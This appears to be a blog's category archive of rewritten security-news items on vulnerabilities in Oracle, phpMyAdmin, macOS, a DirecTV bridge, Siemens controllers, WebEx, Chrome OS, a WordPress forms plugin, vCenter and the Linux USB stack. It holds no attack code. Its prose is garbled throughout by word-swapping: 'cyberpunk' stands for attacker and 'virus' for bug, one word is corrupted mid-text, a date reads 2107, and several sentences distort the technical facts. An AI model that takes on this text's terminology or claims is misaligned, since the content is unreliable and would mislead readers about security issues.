Category Archives: Vulnerability Assessment

Oracle Says Nothing on Meltdown or Spectre Vulnerabilities

Oracle keeps silence over the Meltdown or Spectre susceptibilities are a problem for its hardware. It has no answer to deliver to the media except “no comment”, making it a prominent run-away from the Intel’s list of x86 merchants’ consultancies on how to manage the dual problems.

Oracle obviously functions an x86 cloud, users visualizes would be extreme to acquire of any imminent disturbances or facility degradation. Big Red is also speechless about whether Spectre and Meltdown relate to its SPARC hardware. Asking to Fujitsu about its SPARC position and the company stated The Reg “We are in the process of checking the status. Details of updates will continue to be published by Fujitsu as they become available.”

But Oracle’s typical garrulity on software fixes may have exposed the company’s x86 patch: the company’s performance of its quarterly fix junk due on coming Tuesday, lists “Oracle X86 Servers, versions SW 1.x, SW 2.x” in the middle of the 97 products to be fixed.

Sun ZFS Storage Appliance Operators have been advised to support for a seriousness 10.0 patch, whereas users of Oracle’s Fusion Middleware, PeopleSoft, Oracle Retail, Virtualization, Communications Applications and the Supply Chain Suite have 9.8-rated errors to compete.

Maximum fixes are for applications*, but Solaris 10 and 11.3 created the list too, as prepared the Java Advanced Management Console and the Java ME SDK.

* Including Oracle’s Cruise Dining Room Management application, the Cruise Fleet Management application and the Cruise Shipboard Property Management System. Who knew those apps even existed?

Harmful Susceptibility Reported in phpMyAdmin

According to the update published just before the vacations by the designers of phpMyAdmin fixes a severe vulnerability that can be exploited to execute damaging database processes by getting directed administrators to connect on individually crafted links.

phpMyAdmin is one of the free and open source tools developed for organizing MySQL databases over the Internet. phpMyAdmin is the top MySQL database administration tools having more than 200,000 downloads on monthly basis. A researcher from India, Ashutosh Barot revealed that phpMyAdmin is influenced by a Cross-Site Request Forgery (CSRF) error that can be exploited by a cyberpunk to drop tables, delete records, and execute other database processes.

A genuine admin requires clicking on a particularly crafted URL for the attack to work. Though, Barot recorded that the attack efforts as long as the user is signed in to the cPanel web hosting administration interface, even if phpMyAdmin has been shut down after use. These sorts of attacks are likely due to the element that susceptible versions of phpMyAdmin practice GET demands for database processes, but fail to deliver CSRF security.

The Indian researcher also revealed that the URLs connected with database processes executed via phpMyAdmin are kept in the web browser history, which can position security threats.

“The URL will contain database name and table name as a GET request was used to perform DB operations,” Barot said in a blog post published on Friday. “URLs are stored at various places such as browser history, SIEM logs, firewall logs, ISP logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!). Wherever the URL is being saved, an adversary can gain some information about your database.”

phpMyAdmin designers patched the CSRF vulnerability discovered by Barot with the announcement of version 4.7.7. All preceding 4.7.x versions are obstructed by the security hole, which phpMyAdmin has identified as harmful. Users have been recommended to update their installations or apply the available fix.

Unfixed macOS Error Permits Code Functioning, Root Obtain

A researcher has publicly announced the details of an unfixed vulnerability in macOS who has specialized in hacking Apple’s iOS operating system. He further stated that it can be exploited to take widespread mechanism of a system.

The specific facts of the exploit and proof-of-concept (PoC) code were announced public on the first day of 2018 by a researcher who practices the online moniker Siguza (s1guza). A cyberpunck has accessed to a system can influence the susceptibility, which the professional has defined as a “zero day,” to implement random code and acquire root approvals.

This Local Privilege Escalation (LPE) susceptibility marks IOHIDFamily, a kernel extension programed for Human Interface Devices (HID), such as a touchscreen or buttons. While efforts to determine errors that would let him hack the iOS kernel, Siguza observed that some modules of this extension, precisely IOHIDSystem, occur only on macOS, which led him to recognize a possibly severe security hole.

The researcher discovered the bugs damaged all versions of macOS and they can reached to an arbitrary read/write susceptibility in the kernel. The exploit generated by the hacker also restricts the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security structures. Yet, the professional researcher figured out that his exploit, dubbed IOHIDeous, is not silent as it desires to force a logout of the logged-in user. Alternatively, a cyberpunck could develop an exploit that is activated when the directed device is shut down manually or restarted.

Certain of the PoC code created are available by Siguza only works on macOS High Sierra 10.13.1 and former. But the professional researcher trusts the exploit can be pinched to work on the newest version also, namely 10.13.2, which Apple unconfined on December 6, 2107. The professional have faith in the vulnerability has been everywhere since 2002, but certain clues propose it could essentially be a decade older than that. “One tiny, ugly bug. Fifteen years. Full system compromise,” Siguza said.

The researcher also stated that he would have informed his discoveries to Apple as a substitute revealing them to the public if the error had been greatly exploitable or if the tech giant’s bug abundance program enclosed macOS.

SecurityWeek has visited to Apple correspondent for comment and will bring up to date facts to this article if the company answers. Certain people may argue that creating the exploit public sets macOS users at danger of attacks, but Siguza trusts that is not the case.

Risky Zero-Day Lets Remote ‘Root’ Hacking of In AT&T DirecTV WVB Devices

Zero-Day Initiative researchers disclose an unfixed serious vulnerability influencing a wireless video bridge employed by DirecTV permits for a cyberpunk to distantly implement code on the susceptible devices.

Image Source

The security susc15e|fy&86lng7eptibility was revealed in the Linksys WVBR0-25 wireless video bridge, which was planned to couple with the Wireless Genie Mini (C41W) cable box to make sure communication with DirecTV’s main Genie DVR. Trend Micro DVLabs researcher, Ricky Lawshae, revealed the vulnerability tracked as CVE-2017-17411 and featuring a CVSS score of 10. Lawshae further says that verification is not essential when endeavoring to exploit the susceptibility for implementing the arbitrary code.

“The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges,” a ZDI advisory reads.

Lawshae also exposed while endeavoring to glance to the web server on the device, instead of a login prompt or an index-page, the amenity would carry “the output of several diagnostic scripts containing just about everything you could want to know about the bridge, including the WPS pin, connected clients, running processes, and much more.”

Not just this is an evidence revelation issue, but the log file similarly exposed the commands being implemented and the output of each command. Furthermore, it displayed that the user’s IP address and user-agent were utilized in a system command as a method of access logging or tracing practically.

However, the device isn’t appropriately disinfecting the user-agent it is specified and the researcher was capable to alter the user-agent and send unreliable data to the system for implementation. What Lawshae exposed was that the system performed the command as root, lacking a login rapid or contribution refining before transferring the appreciation to the task accountable for its implementation. Since the Lighttpd method carries on with source privileges, implemented instructions carry on with core rights as well, even if they originate from the unreliable input.

“It literally took 30 seconds of looking at this device to find and verify an unauthenticated remote root command injection vulnerability,” Lawshae says.

The researcher revealed that it was carrying on a Lighttpd web server after executing a more profound exploration of the device. It was arranged to extract a SysInfo.asp file when glancing at the core of the website, and this file was the page showing all the analytic output.

“It also showed dispatcher.cgi was actually a symbolic link to apply.cgi, which itself is a compiled ARC executable file used as kind of a “do everything” agent for the web server. It was in apply.cgi that I found the actual root cause,” Lawshae, who also published a video detailing the vulnerability, explains.

The ZDI endeavored to work with Linksys to talk about the susceptibility, but to no benefit. The company has not even approved it yet even though it was well-known on the bug in June, which resolute ZDI to announce the 0-day report. SecurityWeek communicated Linksys for a statement on the problem but has not got any answer yet. We’ll inform the article as soon as we get something back from them.

“In the absence of an actual patch from the vendor, users should protect themselves by limiting the devices that can interact with the WVBR0-25 to those that actually need to reach it,” Lawshae concludes.

Serious Flaw Found in Many Siemens Industrial Products

Different goods manufactured by Siemens are found defected with a critical vulnerability that can be oppressed by a distant cyberpunk to cause systems to move in a denial-of-service (DoS) situation.

The flaw, tracked as CVE-2017-12741 and rated “high severity,” was reported to Siemens by George Lashenko of industrial cybersecurity firm CyberX.

The list of marked products according to Siemens contains SIMATIC S7-200 Smart micro-PLCs for small automation applications, SIMATIC S7 CPUs, SIMATIC WinAC RTX software controllers, SIMATIC ET 200 PROFINET interface modules, SIMATIC PN/PN couplers, SIMATIC Compact field units, development kits for PROFINET IO, SIMOTION motion control systems, SINAMICS converters, SINUMERIK CNC automation solutions, SIMOCODE motor management systems, and SIRIUS 3RW motor soft starters.

Cyberpunk can cause defected systems to glitch by sending them particularly crafted packets through UDP port 161, which is utilized for the Simple Network Management Protocol – SNMP. So as to improve from the denial-of-service (DoS) form, the devices should be restarted through manual functioning. The justifying causes sector of Siemens’ advisory lists the necessity that the cyberpunk must have network grant for manipulation, and the actual that it instructs organizations to function these devices merely in expected environments.

Though, CyberX stated SecurityWeek that there are approximately 2,000 Siemens devices attainable from the Internet, containing about 400 that have an exposed SNMP port, which could create them vulnerable to the enterprise’s exploit.

“DoS vulnerabilities shouldn’t be taken lightly,” CyberX said. “The December 2016 attack on the Ukrainian electrical grid used this type of exploit to disable protection relays and make it more difficult for operators to recover.”

The security organization stated that Siemens was very receptive to its vulnerability report. The dealer has issued firmware updates that fix the error in few SIMATIC S7, EK-ERTEC, SIMOTION and SINAMICS goods. Siemens mentions deactivating SNMP, which fully mitigates the vulnerability until patches get available for the former marked goods, defending network attain to port 161, smearing protect-in-depth and cell defense perceptions, and utilizing VPNs.

Cisco Fixes Multiple Harmful WebEx Vulnerabilities

Cisco released updates for various elements of its online video conferencing and meeting platform WebEx fix approximately multiple vulnerabilities, containing harmful errors that can be oppressed for faraway code implementation.

An amount of six susceptibilities distressing the WebEx Network Recording Player for Advanced Recording Format – ARF and WebEx Recording Format – WRF files have been categorized as harmful. The influenced player is utilized to play back recorded WebEx meetings, conferences, and seminars. It can be fitted mechanically when a recording data file hosted on a WebEx server is released.

The security and safety holes influencing the Network Recording Player can be oppressed by a faraway cyberpunk to reason a denial-of-service (DoS) situation in the software and perhaps perform random code by attaining the directed user to expose particularly created ARF or WRF files. Cisco identified that the cyberpunk can send the hostile files to sufferers via email or acquire them to expose a web page hosting the data files.

Cisco has fixed the susceptibilities in WebEx Business Suite meeting and conference sites, WebEx Meetings sites, WebEx Meetings Server, and WebEx ARF and WRF Players. The advisory of Cisco offers complete information on influenced versions and the accessibility of patches. The CVE identifiers have been allocated as given below: CVE-2017-12367, CVE-2017-12368, CVE-2017-12369, CVE-2017-12370, CVE-2017-12371 and CVE-2017-12372.

Andrea Micalizzi (rgod) and Steven Seeley of Offensive Security reported the errors to Cisco via Trend Micro’s Zero Day Initiative (ZDI), Fortinet’s Kushal Arvind Shah, and Qihoo 360 researcher Yihan Lian. ZDI has until now to create the advisories for the errors identified by Seeley and Micalizzi public.

Cisco got no sign that the susceptibilities had been oppressed in hostile threats.

Moreover, Lian revealed a moderate sternness DoS susceptibility in the WebEx Network Recording Player. A distant assailant can root the player to smash by receiving the directed user to expose a hostile WRF data file.

The networking giant issued four extra advisories describing WebEx susceptibilities on Wednesday. These feebleness has also been valued “medium severity” and they contain cross-site scripting – XSS and URL rerouting susceptibilities in WebEx Meeting Center, an information revelation virus in Event Center, and an error that can be oppressed to adjust the greeting message in Meeting Server.

Google Reveals Facts of $100K Chrome OS Errors

Google has announced publicly about the facts of a code execution exploit chain for Chrome OS that has received a researcher $100K. Google has declared its purpose to provide up to $100K for an exploit chain in March 2015 that would guide to an obstinate cooperation of a Chromebox or Chromebook in guest manner via a web page. Preceding to that, the organization had existing $50K for such an exploit.

A researcher who utilizes the online nickname Gzob Qq notified Google on September 18 that he had recognized a sequence of susceptibilities that could lead to obstinate code execution on Chrome OS, the system for functioning on Chromebox and Chromebook devices. The exploit chain comprises an out of limits memory obtain error in the V8 JavaScript engine (CVE-2017-15401), an honor appreciation in Page State (CVE-2017-15402), a facility injection fault in the network diag element (CVE-2017-15403), and symlink traversal concerns in clang reporter (CVE-2017-15404) and crypto-homed (CVE-2017-15405).

Gzob Qq, the researcher delivered Google an evidence of perception exploit verified with Chrome 60 and Chrome operating system platform version 9592.94.0. Google covered the vulnerabilities on October 27 with the launching of Chrome OS 62 platform version 9901.54.0/1, which also spoken the recently revealed KRACK susceptibilities. On October 11, Google notified the researcher that he had received the amount $100K Pwnium reward. Pwnium was a one-day hacking event that Google organize every year together with the CanSecWest seminar until February 2015, when it absolute to chance Pwnium into a year program.

The initial report of Gzob Qq’s that defines the complete exploit chain, Google announced publicly last week, along with the warning for each of the vulnerabilities it influences. It was not the first time the researcher has received a $100K reward from Google. Unevenly previous year, he stated a related Chrome OS exploit chain for which he earned the equal amount. One more researcher, named George Hotz had earned $150K at the Pwnium competition back in 2014 for an obstinate Chrome OS exploit.

Threats Revealed in WordPress Sites via ‘Formidable Forms’ Flaws

A researcher found vulnerabilities in a famous WordPress plugin which malicious actors can exploit to obtain approach to sensitive data and hold control of harmful websites.

Formidable Form is a WordPress plugin that lets users to simply generate contact pages, polls and surveys, and several sorts of forms. The plugin is available in both free and paid version that offers additional features and has more than 200,000 active installations. Jouko Pynnönen from Klikki Oy Company, Finland; has examined the plugin and revealed numerous vulnerabilities, containing ones that present critical security threats to the websites utilizing it. The error with the maximum severity is an unsighted SQL injection that can permit attackers to compute a website’s records and acquire their content. Revealed data contains WordPress user credentials and data accepted to a website through Formidable forms.

The researcher also floated one more flaw that reveals data accepted through Formidable forms. Both this and the SQL injection virus are associated with Formidable’s execution of short-codes, WordPress-definite code that lets users increase several sorts of content to their websites with very slight struggle. Pynnonen also exposed mirrored and kept cross site scripting (XSS) susceptibility. The stored XSS lets an attacker implement random JavaScript code in the context of browsing session of administrator – the attacker inserts the malicious code through forms and it executes when observed by the website administrator in the WordPress panel.

The expert similarly observed that if the iThemes Sync WordPress upkeep plugin exists together with Formidable Forms. An attacker can utilize the aforesaid SQL injection error to acquire a user’s ID and a verification key. This data can be utilized to regulate WordPress through iThemes Sync, containing to add original admins or set up plugins. Formidable Forms mentioned the susceptibilities with the publication of different versions 2.05.02 and 2.05.03. iThemes Sync never views the threat vector defined by the researcher as a susceptibility so it did not release a patch.

Pynnonen recognized these errors after being requested to participate in a HackerOne-hosted virus bounty platform that provides rewards of up to $10,000. The platform was run by an unidentified tech company based in Singapore, but the Formidable Forms vulnerabilities capable of a bounty as a result of the element that the plugin had been utilized by the firm. Exploitation of the errors on the tech firm’s website could have permitted an attacker to obtain access to personal evidence and further sensitive data.

However, the researcher received about $4,500 for the SQL injection susceptibility and some hundred dollars for every extra security holes. Still, the researcher is dissatisfied that the Singapore based company moderated the threats posed by the errors and reduced the severity of the SQL injection virus from “dangerous” to “high”.

Pynnonen formerly recognized harmful susceptibilities in Yahoo Mail, WordPress plugins and the WordPress core.

VMware Patches Harmful vCenter Server Susceptibility

A combined severity vulnerabilities had affected The VMware vCenter Server management software that can exploit for attaining information and distant denial-of-service (DoS) threats.

The initial fault was tracked as CVE-2017-4927, is associated with how vCenter Server manages particularly abled LDAP network packets. An invader can exploit the susceptibility distantly to reason a DoS situation. A Fortinet researcher revealed the susceptibility in January, but it was merely authorized in April and marked after few months. Fortinet has released its own recommendation for the security hole and allocated it a threat rating of 3/5.

The main issue was affected vCenter Server 6.0 and 6.5 on a platform and it has been spoken with the publication of different versions 6.0 U3c and 6.5 U1. The second susceptibility, CVE-2017-4928, influences the Flash-based vSphere Web Client; VMware figured out that the HTML5-based application is not impacted. This CVE indicator has truly been allotted to two feebleness revealed by a Tencent researcher in the product: a server-side appeal counterfeit (SSRF) matter and a CRLF injection bug.

“An attacker may exploit these issues by sending a POST request with modified headers towards internal services leading to information disclosure,” VMware said in its advisory.

vCenter Server 5.5 and 6.0 are influenced, and patches are contained in these versions 5.5 U3f and 6.0 U3c. VMware’s release of the susceptibilities corresponds to the announcement of vCenter Server 6.0 U3c. The extra versions that contain patches for these safety holes, 5.5 U3f, and 6.5 U1, were made accessible in mid of September and late July, separately. Version 6.5 U1 similarly patched a reasonable sternness stored cross site scripting (XSS) susceptibility in the vCenter Server H5 Client. The fault can be oppressed by a legitimate attacker to perform malicious JavaScript code in the directed user’s setting.

A bug had also affected versions 5.5, 6.0 and 6.5 of vCenter Server that permits an assailant with partial user rights to misuse an API so as to use the guest functioning system without validation. The fault was revealed at end of July at the security conference named as Black Hat held in Las Vegas, but VMware has solely delivered for overcoming the defect for it.

Numerous Vulnerabilities Discovered in Linux Kernel USB Subsystem

Andrey Konovalov, a researcher at the Google had found out the significant number of vulnerabilities in Linux kernel USB subsystem utilizing the Google Syzkaller fuzzer. Google’s fuzzing tool facilitated Konovalov and found tens of bugs containing twenty-two security flaws that have been allocated CVE identifiers. The expert presented the thorough details in a review published this week that he had discovered about fourteen vulnerabilities.

Konovalov described the vulnerabilities as use-after-free, common security fault, out-of-bounds read, and NULL pointer dereference concerns that can be utilized to source a denial-of-service (DoS) situation. Further, the expert stated few of the flaws might have a distinct influence as well, which naturally means they could let random code implementation.

The researcher also expressed that an attacker requires to have physical access to the aimed system and associate a malicious USB device so as to exploit the vulnerabilities. Some others recommended that an attacker who has faraway access to a machine may be capable to update the firmware on associated USB drives to position exploits for these faults and generate malicious devices.

Konovalov found quite many fixes for numerous vulnerabilities which are contained within Linux kernel versions 4.13.4 and later. Unfortunately, several issues still remain unpatched. On the contrary, Linux distributes ions do not appear too worried about such security and protection holes and allotted them low severity ratings.

The Google researcher not only discovered the flaws in Linux kernel but back in February, he also informed finding in the vicinity exploitable code execution flaw. It had been presented in the kernel for more than eleven years. This double-free susceptibility (CVE-2017-6074) was also distinguished by using the Syzkaller fuzzer. Even, he also revealed it this year in May about the facts of a privilege rapidly increase bug that could be considered unfair via packet sockets. A detailed analysis of quite many CVEs carried out the previous year and presented that the average period of a Linux kernel vulnerability is about five years.